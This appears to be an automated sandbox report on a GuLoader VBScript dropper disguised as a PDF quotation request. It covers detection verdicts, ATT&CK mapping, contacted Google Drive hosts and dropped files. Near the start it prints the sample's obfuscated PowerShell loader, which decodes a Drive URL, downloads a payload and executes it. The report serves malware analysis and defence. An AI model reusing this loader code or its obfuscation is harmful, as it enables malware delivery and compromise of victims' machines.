rsgspec = siev$ indga lalczoophhede,hi rewanuncanerverisuncofedagk
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#tnkningen acnes udgangsstrm lakfernisens svigefuldere poplesie nonpardoning #>;$harlequinic9='faineant';<#binit reveree opnaaes #>;$stooled=$anapstiske+$host.ui; function katabolize($bevaringernes){if ($stooled) {$procenttegnet++;}$reassignments=$diamantsliberes+$bevaringernes.'length'-$procenttegnet; for( $forhekselserne=5;$forhekselserne -lt $reassignments;$forhekselserne+=6){$proempiricist=$forhekselserne;$oversigstabeller+=$bevaringernes[$forhekselserne];$udslg120='telepatis';}$oversigstabeller;}function salvierne($dedentition){ . ($tdlens) ($dedentition);}$diskettestrelserne=katabolize 'thesampa mio dru zvoldgibud.ilburgulspdetakbest/mi nn ';$klaner='forda[shri nfem ieindtjtfaddl.tantas akebege atrwatc,vpo taitotnecmonuredativpgenfuofiberi unsinhen.itcoticmho.lta uncon f.rsalrke gspnd edosshromgaa]eskim:cot a:pose sunde.e kvitcprog uo,erird ughirundetf rsdyl.ksepodiumrret.rohippetin ulom rtyc nonsoknaldlnonne vuls=bior ';$diskettestrelserne+=katabolize 'doxog5strin.wittd0cardi rejs(gennewtrilli fortncoudrd togeounc mwunsoosrekla baudrntr.glt spag prakt1tel,s0 ansk.afdan0 uber; ob.c aflaawss eriwhirlnpatos6 oil.4 macr;vrtdy str fxecba 6velge4infri;decid flyvrkompova,jac: besc1klipd3indsp1fremt.gensk0boome)rehea desengcyanoepre ocklaphk me ioglams/u sco2gri l0a mbe1o.skr0.rimi0.elik1humrs0pseud1campe slvbrfcomi i t anrillege jordf xpreoslavixantom/tendr1unr c3tipol1 funk.aflir0aut s ';$klaner+=' mosa[ di gnunknoegonaptdistr.typifsschisevels.cransaupa narbevikifirbltmonady i plpappenrhe aaoudmaat vocaoisenkc fingopreuslperlot enhuysnohapd milep,nti] attr ';$udekampenes=katabolize ' s,lvu dispsprogre skolrteglt-tub pabeklagparasemaskonirgrntkrimi ';$achinese=katabolize 'microhslaantmusett neoppsvlges stra:beher/varme/pulved acrorafdrai mumiv likke lder.usandgfairbotr ldoconvogsor kladskievindi. befcfyldooevangmpha,a/anomaupron crandp?drivhe strax resopf lskohuastrfattitkunde=sokkedfornro,eathwhalakncykell fondo em harastld chl &tarwoi piradcallb=i,dit1hottodskrifraarpexsailo- pres4 andf-haan skamm,5sn wb-diale4 revn2exedremars,c over5ostre5,emervr.gnfnfrid f sukkoover o fr sk bagtcdibblndemagrbodegwbra,dqstrom_majeux sen.p a thfvende4,ncureor el ';$unprincipal=katabolize ' halv> avl ';$tdlens=katabolize 'topkiifod.aestr,txlogom ';$slideproof='nkke';$klaner+='vaes.:anstu:skrivt rainle uiasduvet1promi2empa. ';$sysker='\solidifiable.sch';salvierne (katabolize 'qu en$underg settlsabbao ca cb.tgjaapsychlrges,:srligv oghee defeskurert p steblommucarnar l ssoflycaptorsketransrpolessspr,g= upe$sporaestudenmundtvatomf: supeaungulp camppc ystdhaystahjemltunz,pa smaa+helti$trosas eft y uaegsnonilkfastged rsirlokal ');salvierne (katabolize ' ioke$matrogunswalrefu ore isbdrejnaana klst,pf:vomitc disthreligai dekiuncrer koncmtetraepressnillusdhunfyi jarnnko rsgspec = siev$ indga lalczoophhede,hi rewanuncanerverisuncofedagkJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		221
              Scripting              		311
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542324 Sample: RFQ_24196MR_PDF.vbs Startdate: 25/10/2024 Architecture: WINDOWS Score: 100 25 drive.usercontent.google.com 2->25 27 drive.google.com 2->27 33 Malicious sample detected (through community Yara rule) 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 Yara detected GuLoader 2->37 39 4 other signatures 2->39 8 wscript.exe 1 2->8         started        11 powershell.exe 15 2->11         started        signatures3 process4 signatures5 41 VBScript performs obfuscated calls to suspicious functions 8->41 43 Suspicious powershell command line found 8->43 45 Wscript starts Powershell (via cmd or directly) 8->45 55 2 other signatures 8->55 13 powershell.exe 14 20 8->13         started        47 Early bird code injection technique detected 11->47 49 Writes to foreign memory regions 11->49 51 Found suspicious powershell code related to unpacking or dynamic code loading 11->51 53 Queues an APC in another process (thread injection) 11->53 17 msiexec.exe 6 11->17         started        19 conhost.exe 11->19         started        process6 dnsIp7 29 drive.google.com 142.250.185.238, 443, 49730, 49731 GOOGLEUS United States 13->29 31 drive.usercontent.google.com 172.217.16.193, 443, 49732, 49740 GOOGLEUS United States 13->31 57 Found suspicious powershell code related to unpacking or dynamic code loading 13->57 21 conhost.exe 13->21         started        23 WerFault.exe 21 17->23         started        signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              RFQ_24196MR_PDF.vbs32%ReversingLabsScript.Trojan.GuLoader

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://crl.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              		142.250.185.238
              		truefalse
                		unknown
                drive.usercontent.google.com
                		172.217.16.193
                		truefalse
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://drive.usercontent.google.compowershell.exe, 00000001.00000002.1908818766.000001DEDDC56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://go.micropowershell.exe, 00000001.00000002.1908818766.000001DEDCA70000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://drive.usercontent.google.com(powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://drive.usercontent.googhpowershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://drive.usercontent.google.com/msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://drive.google.compowershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://drive.google.com/5fmsiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://www.google.compowershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://drive.google.com/=fmsiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://drive.googPRpowershell.exe, 00000001.00000002.1908818766.000001DEDD63B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://crl.micropowershell.exe, 00000006.00000002.2123074697.0000000007201000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://aka.ms/pscore6lBdqpowershell.exe, 00000006.00000002.2093208031.00000000045F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://contoso.com/powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://drive.google.compowershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDD63B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC05D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://drive.usercontent.google.compowershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://aka.ms/pscore68powershell.exe, 00000001.00000002.1908818766.000001DEDBB21000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://apis.google.compowershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1908818766.000001DEDBB21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2093208031.00000000045F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.217.16.193
                                              		drive.usercontent.google.comUnited States
                                              		15169GOOGLEUSfalse
                                              142.250.185.238
                                              		drive.google.comUnited States
                                              		15169GOOGLEUSfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1542324
                                              Start date and time:2024-10-25 19:42:21 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 6m 32s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:RFQ_24196MR_PDF.vbs
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winVBS@9/11@2/2
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 80%
                                              • Number of executed functions: 41
                                              • Number of non-executed functions: 24
                                              Cookbook Comments:
                                              • Found application associated with file extension: .vbs

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 6288 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7100 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: RFQ_24196MR_PDF.vbs

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              13:43:18API Interceptor119x Sleep call for process: powershell.exe modified
                                              13:44:26API Interceptor1x Sleep call for process: WerFault.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              No context

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0e3coxOaV92n.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              khwHsyfsJ1.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              Qjq85KfhBC.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              96r3GgxntQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              e5mSvqt7Ho.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              3coxOaV92n.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              37f463bf4616ecd445d4a1937da06e19https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0Y7M4M4N1J5K4K6Y6N5R4&c=E,1,OlGTQS9-XwC2vBMWr7I6ylXZJam5iCAEz8vCZAxOsyVrFii_1IhqZZqiTz_dLP-ondxd1F0_mQoffiXjC_RNTQQ_48xVwrK55zuEfYrxqUa2Wr6UOEIpqcM,&typo=1Get hashmaliciousUnknownBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1Get hashmaliciousUnknownBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              oNL2jSvLHj.exeGet hashmaliciousStealc, VidarBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              COMPROBANTE DE PAGO.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              Factura 1-014685.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193
                                              Factura n#U00baB-2542.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 142.250.185.238
                                              • 172.217.16.193

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_5bf5219ded9fba7eedec77d072a1c9e5c7a57c4_4aa59577_bced51df-f61f-4fea-9980-4eb0aca94c31\Report.wer

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.1148734766408668
                                              Encrypted:false
                                              SSDEEP:192:UJonW8UMgT0BU/YjeTipG/zuiFUZ24IO8QR:up8UMgABU/YjeX/zuiFUY4IO8QR
                                              MD5:D83E58F2B2A83A8557BA24F0DB1FE1E7
                                              SHA1:C5198ADE91ECF7CBAAC519EF97713D2DBDFC13E9
                                              SHA-256:6BE475A7200CD0179549A3B02FCDF13D9AD76F10A3CC8DFF5DD2439A28998A6F
                                              SHA-512:83F23E8954BEF515263B37D490DEA0719D0649C8082DB0F6BD2271E2B2EEF0479231FCF1562560A65B0E6A376786E309A861CDC8FB66343ACA57161429B7F9B3
                                              Malicious:false
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.5.1.8.5.3.0.7.5.5.6.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.5.1.8.5.3.6.3.8.0.5.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.e.d.5.1.d.f.-.f.6.1.f.-.4.f.e.a.-.9.9.8.0.-.4.e.b.0.a.c.a.9.4.c.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.c.8.1.2.1.e.-.6.e.9.3.-.4.b.3.e.-.8.3.5.9.-.b.d.7.3.7.f.3.0.d.5.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.f.c.-.0.0.0.1.-.0.0.1.4.-.3.d.7.b.-.9.5.7.5.0.5.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.d.0.c.7.c.f.c.a.8.1.0.4.d.0.6.d.e.1.f.0.8.b.9.7.f.2.8.b.3.5.2.0.c.2.4.6.c.d.

